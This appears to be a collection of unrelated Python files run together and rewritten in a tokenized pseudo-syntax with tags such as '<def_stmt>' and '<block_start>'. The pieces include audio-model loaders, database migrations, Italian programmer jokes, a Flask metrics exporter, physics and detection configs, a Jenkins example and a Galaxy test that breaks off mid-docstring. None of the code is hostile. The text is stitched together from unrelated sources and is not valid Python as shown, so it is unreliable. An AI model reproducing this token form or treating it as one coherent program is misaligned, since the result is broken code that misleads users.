loader["key1"] key1 /some/path/a.h5:feats_1,feats_2 key2 /some/path/b.h5:feats_1,feats_2 key3 /some/path/c.h5:feats_1,feats_2 key4 /some/path/d.h5:feats_1,feats_2 ... >>> loader = HDF5ScpLoader("hdf5.scp") # feats_1 and feats_2 will be concatenated >>> array = loader["key1"] """<def_stmt>__init__ self feats_scp default_hdf5_path="feats"<block_start>"""Initialize HDF5 scp loader. Args: feats_scp (str): Kaldi-style feats.scp file with hdf5 format. default_hdf5_path (str): Path in hdf5 file. If the scp contain the info, not used. 
"""<line_sep>self.default_hdf5_path=default_hdf5_path<with_stmt>open(feats_scp)<as>f<block_start>lines=[line.replace("\n" "")<for>line f.readlines()]<block_end>self.data={}<for_stmt>line lines<block_start>key,value=line.split()<line_sep>self.data[key]=value<block_end><block_end><def_stmt>get_path self key<block_start>"""Get hdf5 file path for a given key."""<line_sep><return>self.data[key]<block_end><def_stmt>__getitem__ self key<block_start>"""Get ndarray for a given key."""<line_sep>p=self.data[key]<if_stmt>":"<in>p<block_start><if_stmt>len(p.split(","))<eq>1<block_start><return>read_hdf5(*p.split(":"))<block_end><else_stmt><block_start>p1,p2=p.split(":")<line_sep>feats=[read_hdf5(p1 p)<for>p p2.split(",")]<line_sep><return>np.concatenate([f<if>len(f.shape)<ne>1<else>f.reshape(-1 1)<for>f feats] 1)<block_end><block_end><else_stmt><block_start><return>read_hdf5(p self.default_hdf5_path)<block_end><block_end><def_stmt>__len__ self<block_start>"""Return the length of the scp file."""<line_sep><return>len(self.data)<block_end><def_stmt>__iter__ self<block_start>"""Return the iterator of the scp file."""<line_sep><return>iter(self.data)<block_end><def_stmt>keys self<block_start>"""Return the keys of the scp file."""<line_sep><return>self.data.keys()<block_end><def_stmt>values self<block_start>"""Return the values of the scp file."""<for_stmt>key self.keys()<block_start><yield>self[key]<block_end><block_end><block_end><class_stmt>NpyScpLoader(object)<block_start>"""Loader class for a fests.scp file of npy file. Examples: key1 /some/path/a.npy key2 /some/path/b.npy key3 /some/path/c.npy key4 /some/path/d.npy ... >>> loader = NpyScpLoader("feats.scp") >>> array = loader["key1"] """<def_stmt>__init__ self feats_scp<block_start>"""Initialize npy scp loader. Args: feats_scp (str): Kaldi-style feats.scp file with npy format. """<with_stmt>open(feats_scp)<as>f<block_start>lines=[line.replace("\n" "")<for>line f.readlines()]<block_end>self.data={}<for_stmt>line lines<block_start>key,value=line.split()<line_sep>self.data[key]=value<block_end><block_end><def_stmt>get_path self key<block_start>"""Get npy file path for a given key."""<line_sep><return>self.data[key]<block_end><def_stmt>__getitem__ self key<block_start>"""Get ndarray for a given key."""<line_sep><return>np.load(self.data[key])<block_end><def_stmt>__len__ self<block_start>"""Return the length of the scp file."""<line_sep><return>len(self.data)<block_end><def_stmt>__iter__ self<block_start>"""Return the iterator of the scp file."""<line_sep><return>iter(self.data)<block_end><def_stmt>keys self<block_start>"""Return the keys of the scp file."""<line_sep><return>self.data.keys()<block_end><def_stmt>values self<block_start>"""Return the values of the scp file."""<for_stmt>key self.keys()<block_start><yield>self[key]<block_end><block_end><block_end><def_stmt>load_model checkpoint config=<none> stats=<none><block_start>"""Load trained model. Args: checkpoint (str): Checkpoint path. config (dict): Configuration dict. stats (str): Statistics file path. Return: torch.nn.Module: Model instance. 
"""<line_sep># load config if not provided <if_stmt>config<is><none><block_start>dirname=os.path.dirname(checkpoint)<line_sep>config=os.path.join(dirname "config.yml")<with_stmt>open(config)<as>f<block_start>config=yaml.load(f Loader=yaml.Loader)<block_end><block_end># lazy load for circular error <import_stmt>parallel_wavegan.models<line_sep># get model and load parameters model_class=getattr(parallel_wavegan.models config.get("generator_type" "ParallelWaveGANGenerator") )<line_sep># workaround for typo #295 generator_params={k.replace("upsample_kernal_sizes" "upsample_kernel_sizes"):v<for>k,v config["generator_params"].items()}<line_sep>model=model_class(**generator_params)<line_sep>model.load_state_dict(torch.load(checkpoint map_location="cpu")["model"]["generator"])<line_sep># check stats existence <if_stmt>stats<is><none><block_start>dirname=os.path.dirname(checkpoint)<if_stmt>config["format"]<eq>"hdf5"<block_start>ext="h5"<block_end><else_stmt><block_start>ext="npy"<block_end><if_stmt>os.path.exists(os.path.join(dirname f"stats.{ext}"))<block_start>stats=os.path.join(dirname f"stats.{ext}")<block_end><block_end># load stats <if_stmt>stats<is><not><none><block_start>model.register_stats(stats)<block_end># add pqmf if needed <if_stmt>config["generator_params"]["out_channels"]<g>1# lazy load for circular error <block_start><import_from_stmt>parallel_wavegan.layers PQMF<line_sep>pqmf_params={}<if_stmt>LooseVersion(config.get("version" "0.1.0"))<le>LooseVersion("0.4.2")# For compatibility, here we set default values in version <= 0.4.2 <block_start>pqmf_params.update(taps=62 cutoff_ratio=0.15 beta=9.0)<block_end>model.pqmf=PQMF(subbands=config["generator_params"]["out_channels"] **config.get("pqmf_params" pqmf_params) )<block_end><return>model<block_end><def_stmt>download_pretrained_model tag download_dir=<none><block_start>"""Download pretrained model form google drive. Args: tag (str): Pretrained model tag. download_dir (str): Directory to save downloaded files. Returns: str: Path of downloaded model checkpoint. """<assert_stmt>tag<in>PRETRAINED_MODEL_LIST f"{tag} does not exists."<line_sep>id_=PRETRAINED_MODEL_LIST[tag]<if_stmt>download_dir<is><none><block_start>download_dir=os.path.expanduser("~/.cache/parallel_wavegan")<block_end>output_path=f"{download_dir}/{tag}.tar.gz"<line_sep>os.makedirs(f"{download_dir}" exist_ok=<true>)<with_stmt>FileLock(output_path+".lock")<block_start><if_stmt><not>os.path.exists(output_path)# lazy load for compatibility <block_start><import_stmt>gdown<line_sep>gdown.download(f"https://drive.google.com/uc?id={id_}" output_path quiet=<false>)<with_stmt>tarfile.open(output_path "r:*")<as>tar<block_start><for_stmt>member tar.getmembers()<block_start><if_stmt>member.isreg()<block_start>member.name=os.path.basename(member.name)<line_sep>tar.extract(member f"{download_dir}/{tag}")<block_end><block_end><block_end><block_end><block_end>checkpoint_path=find_files(f"{download_dir}/{tag}" "checkpoint*.pkl")<line_sep><return>checkpoint_path[0]<block_end>
s=input()<line_sep>y=s[0]<line_sep>w=s[2]<if_stmt>int(y)<g>int(w)<block_start>p=7-int(y)<block_end><else_stmt><block_start>p=7-int(w)<block_end><if_stmt>p<eq>1<block_start>print('1/6')<block_end><if_stmt>p<eq>2<block_start>print('1/3')<block_end><if_stmt>p<eq>3<block_start>print('1/2')<block_end><if_stmt>p<eq>4<block_start>print('2/3')<block_end><if_stmt>p<eq>5<block_start>print('5/6')<block_end><if_stmt>p<eq>6<block_start>print('1/1')<block_end>
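# A compact restatement of the branch table above (a sketch): the chance of
# rolling at least the higher shown face on a fair die is (7 - max) / 6, and each
# printed string is that fraction in lowest terms.
from fractions import Fraction

def dice_probability(line: str) -> str:
    first, second = int(line[0]), int(line[2])
    frac = Fraction(7 - max(first, second), 6)
    return f"{frac.numerator}/{frac.denominator}"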
"""allow modified date as nullable Revision ID: 166054bd81b5 Revises: <PASSWORD> Create Date: 2021-10-11 03:47:20.983464 """<import_from_stmt>alembic op<import_stmt>sqlalchemy<as>sa<import_from_stmt>sqlalchemy.dialects postgresql<line_sep># revision identifiers, used by Alembic. revision="<KEY>"<line_sep>down_revision="80b8d<PASSWORD>"<line_sep>branch_labels=<none><line_sep>depends_on=<none><def_stmt>upgrade # ### commands auto generated by Alembic - please adjust! ### <block_start>op.alter_column("application" "modified" existing_type=postgresql.TIMESTAMP() nullable=<true>)<line_sep>op.alter_column("form_process_mapper" "modified" existing_type=postgresql.TIMESTAMP() nullable=<true> )<line_sep># ### end Alembic commands ### <block_end><def_stmt>downgrade # ### commands auto generated by Alembic - please adjust! ### <block_start>op.alter_column("form_process_mapper" "modified" existing_type=postgresql.TIMESTAMP() nullable=<false> )<line_sep>op.alter_column("application" "modified" existing_type=postgresql.TIMESTAMP() nullable=<false>)<line_sep># ### end Alembic commands ### <block_end>
# -*- coding: utf-8 -*- """ Jokes from stackoverflow - provided under CC BY-SA 3.0 http://stackoverflow.com/questions/234075/what-is-your-best-programmer-joke?page=4&tab=votes#tab-top """<line_sep>neutral=["Trionfalmente, Beth ha rimosso Python 2.7 dal server nel 2020.'Finalmente!' ha detto con gioia, solo per vedere l'annuncio di Python 4.4." "Una query SQL entra in un bar, cammina verso a due table e chiede: 'Posso unirvi?'." "Quando il tuo martello e` C ++, tutto inizia a sembrare un pollice." "Se metti un milione di scimmie su un milione di tastiere, uno di loro alla fine scrivera` un programma Java, il resto scrivera` Perl." "Per comprendere la ricorsione devi prima capire la ricorsione." "Gli amici non permettono agli amici di usare Python 2.7." "Ho suggerito di tenere un 'Python Object Oriented Programming Seminar', ma l'acronimo era impopolare." "'toc, toc'. 'Chi e` la`?' ... pausa molto lunga ... Java." "Quanti programmatori ci vogliono per cambiare una lampadina? Nessuno, e` un problema hardware." "Qual e` il modo orientato agli oggetti per diventare ricchi? Ereditarieta`." "Quanti programmatori ci vogliono per cambiare una lampadina? Nessuno, possono rendere l'oscurita` uno standard." "I vecchi programmatori C non muoiono, sono solo gettati nel void." "Gli sviluppatori di software amano risolvere i problemi: se non ci sono problemi facilmente disponibili li creeranno." ".NET e` stato chiamato .NET in modo che non si visualizzasse in un elenco di directory Unix." "Hardware: la parte di un computer che puoi calciare." "Un programmatore e` stato trovato morto nella doccia, accanto al corpo c'era uno shampoo con le istruzioni:Insapona, risciacqua ripeti." "Ottimista: il bicchiere e` mezzo pieno Pessimista: il bicchiere e` mezzo vuoto Programmatore: il bicchiere e` il doppio del necessario." "In C abbiamo dovuto codificare i nostri bug. In C ++ possiamo ereditarli." "Come mai non c'e` una gara Perl offuscato? Perche` tutti vincerebbero." "Se riproduci un CD di Windows all'indietro, ascolterai il canto satanico ... peggio ancora, se lo riproduci in avanti, installa Windows." "Quanti programmatori ci vogliono per uccidere uno scarafaggio? Due: uno tiene, l'altro installa Windows su di esso." "Come si chiama un programmatore finlandese? Nerdic." "Cosa ha detto il codice Java al codice C? : Non hai classe." "Perche` Microsoft ha chiamato il proprio motore di ricerca BING? Because It's Not Google." "I venditori di software e i venditori di auto usate si differenziano perche` questi ultimi sanno quando mentono." "Bambino: 'papa', perche` il sole sorge ad est e tramonta ad ovest?' Papa': 'figlio, sta funzionando, non toccarlo'." "Quanti programmatori Prolog ci vogliono per cambiare una lampadina? Falso." "I veri programmatori possono scrivere codice assembly in qualsiasi lingua." "Cameriere: 'le piacerebbe un caffe` o un te`?' Programmatore: 'Si'." "Un programmatore entra in un foo ..." "Qual e` il secondo nome di <NAME>? <NAME>." "Perche` sorridi sempre? Questa e` solo la mia ... espressione regolare." "Domanda stupida ASCII, ottiene uno stupido ANSI." "Un programmatore aveva un problema: penso` tra se stesso: 'lo risolvo con i threads!', ora ha due problemi." "Java: scrivi una volta e scappa." "Ti direi una battuta su UDP, ma non lo capiresti mai." "Un ingegnere di QA entra in un bar, si imbatte in un bar, striscia in un bar, balla in un bar, punta i piedi in un bar..." "Ho avuto un problema quindi ho pensato di utilizzare Java. Ora ho una ProblemFactory." 
"L'ingegnere del QA entra in un bar, ordina una birra, ordina 0 birre, 99999 birre, una lucertola, -1 birre, uno sfdeljknesv." "Un responsabile di prodotto entra in un bar, chiede un drink, il barista dice NO, ma prendera` in considerazione l'aggiunta successiva." "Come si genera una stringa casuale? Metti uno studente di Informatica del primo anno davanti a Vim e gli chiedi di salvare ed uscire." "Uso Vim da molto tempo ormai, principalmente perche` non riesco a capire come uscire." "Come fai a sapere se una persona e` un utente Vim? Non ti preoccupare, te lo diranno." "un cameriere urla: 'sta soffocando! Qualcuno e` un dottore?' Programmatore: 'sono un utente Vim'." "3 Database Admins sono entrati in un bar NoSQL e poco dopo sono usciti perche` non sono riusciti a trovare un table." "Come spiegare il film Inception a un programmatore? Quando esegui una VM dentro una VM dentro un' altra VM tutto procede molto lentamente." "Come si chiama un pappagallo che dice 'Squawk! Pezzi di nove! Pezzi di nove!' Un errore a pappagallo." "Ci sono solo due problemi difficili in Informatica: invalidazione della cache, denominazione delle cose e errori di off-by-one." "Ci sono 10 tipi di persone: quelli che comprendono il binario e quelli che non lo sanno." "Ci sono 2 tipi di persone: quelli che possono estrapolare dati da insiemi incompleti ..." "Esistono II tipi di persone: quelli che comprendono i numeri romani e quelli che non li conoscono." "Ci sono 10 tipi di persone: quelli che comprendono l'esadecimale e altri 15." "Ci sono 10 tipi di persone: quelli che capiscono il trinario, quelli che non lo fanno e quelli che non ne hanno mai sentito parlare." "Come chiami otto hobbit? Un hob byte." "La cosa migliore di un booleano e` che anche se ti sbagli, sei solo fuori di un bit." "Un buon programmatore e` qualcuno che guarda sempre in entrambe le direzioni prima di attraversare una strada a senso unico." "Esistono due modi per scrivere programmi privi di errori: solo il terzo funziona." "I controlli di qualita` consistono nel 55% di acqua, 30% di sangue e 15% di ticket in Jira." "Quanti QA servono per cambiare una lampadina? Hanno notato che la stanza era buia,: non risolvono i problemi, li trovano." "Un programmatore si schianta contro un'auto , l'uomo chiede 'cosa e` successo', l'altro risponde'Non so. Facciamo il backup e riprova'." "Scrivere PHP e` come fare pipi` in piscina, tutti lo hanno fatto, ma non hanno bisogno di renderlo pubblico." "Numero di giorni da quando ho riscontrato un errore di indice di array: -1." "gli appuntamenti veloci sono inutili, 5 minuti non sono sufficienti per spiegare correttamente i benefici della filosofia Unix." "Microsoft ha ogni quindici giorni una 'settimana produttiva' dove usa Google invece di Bing." "Trovare un buon sviluppatore PHP e` come cercare un ago in un pagliaio o e` un hackstack in un ago?." "Unix e` user friendly, e` solo molto particolare nella scelta di chi siano i suoi amici." "Un programmatore COBOL guadagna milioni con la riparazione Y2K e decide di congelarsi criogenicamente. L'anno e` 9999." "Il linguaggio C combina tutta la potenza del linguaggio assembly con tutta la facilita` d'uso del linguaggio assembly." "Un esperto SEO entra in un bar, pub, pub irlandese, taverna, barista, birra, liquore, vino, alcolici, liquori ..." "Che cosa significa Emacs? Utilizzato esclusivamente dagli scienziati informatici di mezza eta`." "Che cosa hanno in comune le battute di PyJokes con Adobe Flash? Si aggiornano sempre, ma non migliorano." 
"Quanti demosceners sono necessari per cambiare una lampadina? Meta`. Con uno intero non ci sono sfide." ]<line_sep>""" Jokes from The Internet Chuck Norris DB (ICNDB) (http://www.icndb.com/) - provided under CC BY-SA 3.0 http://api.icndb.com/jokes/ """<line_sep>chuck=["Tutti gli array che Chuck Norris dichiara sono di dimensioni infinite, perche` Chuck Norris non conosce limiti." "Chuck Norris non ha la latenza del disco perche` il disco rigido sa sbrigarsi, altrimenti sono guai." "Chuck Norris scrive codice che si ottimizza da solo." "Chuck Norris non puo` testare l'uguaglianza perche` non ha eguali." "Chuck Norris non ha bisogno di garbage collection perche` non chiama .Dispose (), chiama .DropKick ()." "Il primo programma di Chuck Norris e` stato kill -9." "Chuck Norris ha scoppiato la bolla delle dot com." "Tutti i browser supportano le definizioni esadecimali #chuck e #norris per i colori nero e blu." "MySpace non e` proprio il tuo spazio, e` di Chuck (te lo lascia solo usare)." "Chuck Norris puo` scrivere funzioni infinitamente ricorsive e farle tornare." "Chuck Norris puo` risolvere le Torri di Hanoi in una mossa." "L'unico modello di design che Chuck Norris conosce e` il God Object Pattern." "Chuck Norris ha terminato World of Warcraft." "I project manager non chiedono mai a Chuck Norris le stime." "Chuck Norris non usa gli standard web in quanto il web si conformera` a lui." "'Funziona sulla mia macchina' e` sempre vero per Chuck Norris." "Chuck Norris non fa i grafici di Burn Down, fa i grafici di Smack Down." "Chuck Norris puo` cancellare il cestino." "La barba di Chuck Norris puo` scrivere 140 parole al minuto." "Chuck Norris puo` testare tutte le applicazioni con un'unica affermazione, 'funziona'." "La tastiera di Chuck Norris non ha un tasto Ctrl perche` niente controlla Chuck Norris." "Chuck Norris puo` far traboccare il tuo stack solo guardandolo." "Per Chuck Norris, tutto contiene una vulnerabilita`." "Chuck Norris non usa sudo, la shell sa solo che e` lui e fa quello che gli viene detto." "Chuck Norris non ha bisogno di un debugger, si limita a fissare il codice finche` non confessa." "Chuck Norris puo` accedere a metodi privati." "Chuck Norris puo` istanziare una classe astratta." "L'oggetto classe eredita da Chuck Norris." "Chuck Norris conosce l'ultima cifra del Pi greco." "La connessione di Chuck Norris e` piu' veloce in up che in down perche` i dati sono incentivati a correre via da lui." "Nessuna affermazione puo` prendere la ChuckNorrisException." "Chuck Norris puo` scrivere applicazioni multi-thread con un singolo thread." "Chuck Norris non ha bisogno di usare AJAX perche` le pagine hanno troppa paura di postback comunque." "Chuck Norris non usa la riflessione, la riflessione chiede educatamente il suo aiuto." "Non c'e` alcun tasto Esc sulla tastiera di Chuck Norris, perche` nessuno sfugge a Chuck Norris." "Chuck Norris puo` eseguire la ricerca binaria di dati non ordinati." "Chuck Norris non ha bisogno di tentativi di cattura, le eccezioni sono troppo spaventate da sollevarsi." "Chuck Norris e` uscito da un ciclo infinito." "Se Chuck Norris scrive codice con bug, gli errori si risolvono da soli." "L'hosting di Chuck Norris e` garantito al 101% di uptime." "La tastiera di Chuck Norris ha il tasto Any." "Chuck Norris puo` accedere al database dall'interfaccia utente." "I programmi di Chuck Norris non escono mai, sono terminati." "I programmi di Chuck Norris occupano il 150% della CPU, anche quando non sono in esecuzione." 
"Chuck Norris puo` generare thread che si completano prima di essere avviati." "I programmi di Chuck Norris non accettano input." "Chuck Norris puo` installare iTunes senza installare Quicktime." "Chuck Norris non ha bisogno di un sistema operativo." "Il modello di rete OSI di Chuck Norris ha un solo livello: fisico." "Chuck Norris puo` compilare errori di sintassi." "Chuck Norris non ha bisogno di digitare cast. Il Chuck-Norris Compiler (CNC) vede attraverso le cose, fino in fondo sempre." "Chuck Norris comprime i suoi file con un calcio rotante sul disco rigido." "Con Chuck Norris P = NP. Non c'e` alcun nondeterminismo con le decisioni di Chuck Norris." "Chuck Norris puo` recuperare qualsiasi cosa da / dev / null." "Nessuno ha mai programmato in coppia con Chuck Norris ed e`vissuto per raccontare la storia." "Nessuno ha mai parlato durante la revisione del codice di Chuck Norris ed e` vissuto per raccontare la storia." "Chuck Norris non usa una GUI, preferisce la linea di comando." "Chuck Norris non usa Oracle, lui e` l'Oracle." "Chuck Norris puo` dereferenziare NULL." "Una differenza tra il tuo codice e quello di Chuck Norris e` infinita." "Il plugin Chuck Norris Eclipse e` diventato un contatto alieno." "Chuck Norris e` l'ultimo mutex, tutti i thread lo temono." "Non preoccuparti dei test, i test case di Chuck Norris coprono anche il tuo codice." "Le dichiarazioni del registro di Chuck Norris sono sempre al livello FATAL." "Chuck Norris ha completato World of Warcraft." "Quando Chuck Norris rompe la build, non e` possibile risolverla, perche` non c'e` una sola riga di codice." "Chuck Norris scrive con un dito, lo punta alla tastiera e la tastiera fa il resto." "I programmi di Chuck Norris possono superare il test di Turing fissando l'interrogatore." "Se provi kill -9 con i programmi di Chuck Norris, si ritorce contro." "Chuck Norris esegue loop infiniti in meno di 4 secondi." "Chuck Norris puo` sovrascrivere una variabile bloccata." "Chuck Norris conosce il valore di NULL." "Chuck Norris puo` installare un sistema operativo a 64 bit su macchine a 32 bit." "Chuck Norris puo` scrivere su un flusso di output." "Chuck Norris puo` leggere da un flusso di input." "Chuck Norris non ha mai scritto il suo programma in codice macchina. Le macchine hanno imparato a interpretare il codice di Chuck Norris." "I test unitari di Chuck Norris non girano, muoiono." "Chuck Norris causa la schermata blu della morte." "Chuck Norris puo` fare una classe che e` sia astratta che finale." "Chuck Norris potrebbe usare qualsiasi cosa in java.util.* per ucciderti, inclusi i javadoc." "Il codice gira piu` velocemente quando <NAME> lo guarda." "<NAME> non usa REST, lui aspetta." "Su Facebook a tutti piace <NAME>, che lo scelgano o no." "Non puoi seguire <NAME> su Twitter, perche` lui ti segue." "La calcolatrice di <NAME> ha solo 3 tasti: 0, 1 e NAND." "<NAME> utilizza solo variabili globali. Non ha nulla da nascondere." "<NAME> scrive direttamente in binario. Quindi scrive il codice sorgente come documentazione per altri programmatori." ]<line_sep>jokes_it={'neutral':neutral 'chuck':chuck 'all':neutral+chuck }<line_sep>
# -*- coding: utf-8 -*- # Generated by Django 1.9.6 on 2017-05-09 12:03 <import_from_future_stmt> unicode_literals<import_from_stmt>django.db migrations models<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('submission' '0001_initial') ]<line_sep>operations=[migrations.AlterField(model_name='submission' name='code' field=models.TextField() ) migrations.RenameField(model_name='submission' old_name='accepted_info' new_name='statistic_info' ) migrations.RemoveField(model_name='submission' name='accepted_time' ) migrations.RenameField(model_name='submission' old_name='created_time' new_name='create_time' ) migrations.AlterModelOptions(name='submission' options={'ordering':('-create_time' )} )]<block_end>
"""Utils for date range generation."""<import_from_stmt>datetime datetime<import_from_stmt>typing Union<import_from_stmt>pyspark.sql DataFrame functions<import_from_stmt>butterfree.clients SparkClient<import_from_stmt>butterfree.constants DataType<import_from_stmt>butterfree.constants.columns TIMESTAMP_COLUMN<def_stmt>get_date_range client:SparkClient start_date:Union[str datetime] end_date:Union[str datetime] step:int=<none> <arrow>DataFrame<block_start>"""Create a date range dataframe. The dataframe returning from this method will containing a single column TIMESTAMP_COLUMN, of timestamp type, with dates between start and end. Args: client: a spark client. start_date: range beginning value (inclusive). end_date: range last value (exclusive) step: optional step, in seconds. Returns: A single column date range spark dataframe. """<line_sep>day_in_seconds=60<times>60<times>24<line_sep>step=step<or>day_in_seconds<line_sep>start_date=(start_date<if>isinstance(start_date str)<else>start_date.strftime("%Y-%m-%d"))<line_sep>end_date=end_date<if>isinstance(end_date str)<else>end_date.strftime("%Y-%m-%d")<line_sep>date_df=client.conn.createDataFrame([(start_date end_date)] ("start_date" "end_date")).select([functions.col(c).cast(DataType.TIMESTAMP.spark).cast(DataType.BIGINT.spark)<for>c ("start_date" "end_date")])<line_sep>start_date,end_date=date_df.first()<line_sep><return>client.conn.range(start_date end_date+day_in_seconds step# type: ignore ).select(functions.col("id").cast(DataType.TIMESTAMP.spark).alias(TIMESTAMP_COLUMN))<block_end>
<import_from_stmt>threading Thread<import_stmt>kombu.exceptions<import_from_stmt>flask Blueprint Flask current_app request<import_from_stmt>loguru logger<import_from_stmt>prometheus_client.exposition choose_encoder<import_from_stmt>waitress serve<line_sep>blueprint=Blueprint("celery_exporter" __name__)<line_sep>@blueprint.route("/")<def_stmt>index <block_start><return>""" <!doctype html> <html lang="en"> <head> <!-- Required meta tags --> <meta charset="utf-8"> <title>celery-exporter</title> </head> <body> <h1>Celery Exporter</h1> <p><a href="/metrics">Metrics</a></p> </body> </html> """<block_end>@blueprint.route("/metrics")<def_stmt>metrics <block_start>encoder,content_type=choose_encoder(request.headers.get("accept"))<line_sep>output=encoder(current_app.config["registry"])<line_sep><return>output 200 {"Content-Type":content_type}<block_end>@blueprint.route("/health")<def_stmt>health <block_start>conn=current_app.config["celery_connection"]<line_sep>uri=conn.as_uri()<try_stmt><block_start>conn.ensure_connection(max_retries=3)<block_end><except_stmt>kombu.exceptions.OperationalError<block_start>logger.error("Failed to connect to broker='{}'" uri)<line_sep><return>(f"Failed to connect to broker: '{uri}'" 500)<block_end><except_stmt>Exception# pylint: disable=broad-except <block_start>logger.exception("Unrecognized error")<line_sep><return>("Unknown exception" 500)<block_end><return>f"Connected to the broker {conn.as_uri()}"<block_end><def_stmt>start_http_server registry celery_connection port<block_start>app=Flask(__name__)<line_sep>app.config["registry"]=registry<line_sep>app.config["celery_connection"]=celery_connection<line_sep>app.register_blueprint(blueprint)<line_sep>Thread(target=serve args=(app ) kwargs=dict(host="0.0.0.0" port=port _quiet=<true>) daemon=<true> ).start()<line_sep>logger.info("Started celery-exporter at port='{}'" port)<block_end>
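# A minimal wiring sketch for start_http_server above, assuming a Prometheus
# CollectorRegistry and a kombu broker connection; the broker URL and port are
# illustrative values only.
from kombu import Connection
from prometheus_client import CollectorRegistry

registry = CollectorRegistry()
broker_connection = Connection("redis://localhost:6379/0")
start_http_server(registry, broker_connection, port=9808)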
# Author : <NAME> # Date : July 19th, 2007 # last update: $Date: 2010/03/17 18:17:34 $ by $Author: mussgill $ <import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep># DCS partitions # "EBp","EBm","EEp","EEm","HBHEa","HBHEb","HBHEc","HF","HO","RPC" # "DT0","DTp","DTm","CSCp","CSCm","CASTOR","TIBTID","TOB","TECp","TECm" # "BPIX","FPIX","ESp","ESm" <import_stmt>DPGAnalysis.Skims.skim_detstatus_cfi<line_sep>ALCARECOTkAlCosmicsDCSFilter=DPGAnalysis.Skims.skim_detstatus_cfi.dcsstatus.clone(DetectorType=cms.vstring('TIBTID' 'TOB' 'TECp' 'TECm' 'BPIX' 'FPIX') ApplyFilter=cms.bool(<true>) AndOr=cms.bool(<true>) DebugOn=cms.untracked.bool(<false>))<line_sep>#________________________________Track selection____________________________________ # AlCaReco for track based alignment using Cosmic muons reconstructed by Combinatorial Track Finder <import_stmt>Alignment.CommonAlignmentProducer.AlignmentTrackSelector_cfi<line_sep>ALCARECOTkAlCosmicsCTF=Alignment.CommonAlignmentProducer.AlignmentTrackSelector_cfi.AlignmentTrackSelector.clone(src='ctfWithMaterialTracksP5' filter=<true> applyBasicCuts=<true> ptMin=0. ##10 ptMax=99999. pMin=4. ##10 pMax=99999. etaMin=-99. ##-2.4 keep also what is going through... etaMax=99. ## 2.4 ...both TEC with flat slope nHitMin=7 nHitMin2D=2 chi2nMax=999999. applyMultiplicityFilter=<false> applyNHighestPt=<true> ## select only highest pT track nHighestPt=1)<line_sep># AlCaReco for track based alignment using Cosmic muons reconstructed by Cosmic Track Finder # (same cuts) ALCARECOTkAlCosmicsCosmicTF=ALCARECOTkAlCosmicsCTF.clone(src='cosmictrackfinderP5'## different for CTF )<line_sep># AlCaReco for track based alignment using Cosmic muons reconstructed by Regional Cosmic Tracking # (same cuts) ALCARECOTkAlCosmicsRegional=ALCARECOTkAlCosmicsCTF.clone(src='regionalCosmicTracks')<line_sep>#________________________________Sequences____________________________________ seqALCARECOTkAlCosmicsCTF=cms.Sequence(ALCARECOTkAlCosmicsCTF)<line_sep>seqALCARECOTkAlCosmicsCosmicTF=cms.Sequence(ALCARECOTkAlCosmicsCosmicTF)<line_sep>seqALCARECOTkAlCosmicsRegional=cms.Sequence(ALCARECOTkAlCosmicsRegional)<line_sep>
_base_='../faster_rcnn/faster_rcnn_r50_fpn_1x_coco.py'<line_sep># fp16 settings fp16=dict(loss_scale=512.)<line_sep>
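# Note (an assumption about the usual fp16 setup, not stated in this config): the
# static loss_scale multiplies the loss before the half-precision backward pass so
# small gradients do not underflow, and gradients are unscaled again before the
# optimizer step.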
<import_from_stmt>.matrix_factorization MF<line_sep>
""" A low level example: This is how JenkinsAPI creates views """<import_from_future_stmt> print_function<import_stmt>json<import_stmt>requests<line_sep>url='http://localhost:8080/createView'<line_sep>str_view_name="blahblah123"<line_sep>params={}# {'name': str_view_name} headers={'Content-Type':'application/x-www-form-urlencoded'}<line_sep>data={"name":str_view_name "mode":"hudson.model.ListView" "Submit":"OK" "json":json.dumps({"name":str_view_name "mode":"hudson.model.ListView"})}<line_sep># Try 1 result=requests.post(url params=params data=data headers=headers)<line_sep>print(result.text.encode('UTF-8'))<line_sep>
<import_stmt>logging<import_from_stmt>..base.twilltestcase common ShedTwillTestCase<line_sep>log=logging.getLogger(__name__)<line_sep>category_name='Test 1460 Data Manager'<line_sep>category_description='Test script 1460 for testing Data Managers'<line_sep>data_manager_repository_name='data_manager_1460'<line_sep>data_manager_repository_description='Repository that contains a Data Manager'<line_sep>data_manager_repository_long_description=f'{data_manager_repository_name}: {data_manager_repository_description}'<line_sep>data_manager_name='testing_data_manager'<line_sep>data_manager_tar_file='1460_files/data_manager_files/test_data_manager.tar'<line_sep>''' 1. Add a Data Manager to toolshed 2. install Data Manager 3. Check that Data Manager tool '''<line_sep># TODO: Allow testing actual Execution of installed Data Manager Tool. <class_stmt>TestDataManagers(ShedTwillTestCase)<block_start>'''Test installing a repository containing a Data Manager.'''<def_stmt>test_0000_initiate_users_and_category self<block_start>"""Create necessary user accounts and login as an admin user."""<line_sep>self.login(email=common.admin_email username=common.admin_username)<line_sep>admin_user=self.test_db_util.get_user(common.admin_email)<assert_stmt>admin_user<is><not><none> f'Problem retrieving user with email {common.admin_email} from the database'<line_sep>self.test_db_util.get_private_role(admin_user)<line_sep>self.create_category(name=category_name description=category_description)<line_sep>self.login(email=common.test_user_2_email username=common.test_user_2_name)<line_sep>test_user_2=self.test_db_util.get_user(common.test_user_2_email)<assert_stmt>test_user_2<is><not><none> f'Problem retrieving user with email {common.test_user_2_email} from the database'<line_sep>self.test_db_util.get_private_role(test_user_2)<line_sep>self.login(email=common.test_user_1_email username=common.test_user_1_name)<line_sep>test_user_1=self.test_db_util.get_user(common.test_user_1_email)<assert_stmt>test_user_1<is><not><none> f'Problem retrieving user with email {common.test_user_1_email} from the database'<line_sep>self.test_db_util.get_private_role(test_user_1)<block_end><def_stmt>test_0010_create_data_manager_repository self<block_start>'''Create and populate data_manager_1460. This is step 1 - Create repository data_manager_1460. Create and populate a repository that contains a Data manager. '''<line_sep>category=self.test_db_util.get_category_by_name(category_name)<line_sep>repository=self.get_or_create_repository(name=data_manager_repository_name description=data_manager_repository_description long_description=data_manager_repository_long_description owner=common.test_user_1_name category_id=self.security.encode_id(category.id) strings_displayed=[])<line_sep># Upload the data manager files to the repository. self.upload_file(repository filename=data_manager_tar_file filepath=<none> valid_tools_only=<true> uncompress_file=<true> remove_repo_files_not_in_tar=<false> commit_message=f'Populate {data_manager_repository_name} with a data manager configuration.' strings_displayed=[] strings_not_displayed=[])<block_end><def_stmt>test_0020_install_data_manager_repository self<block_start>'''Install the data_manager_1460 repository to galaxy. This is step 3 - Attempt to install the repository into a galaxy instance, verify that it is installed. 
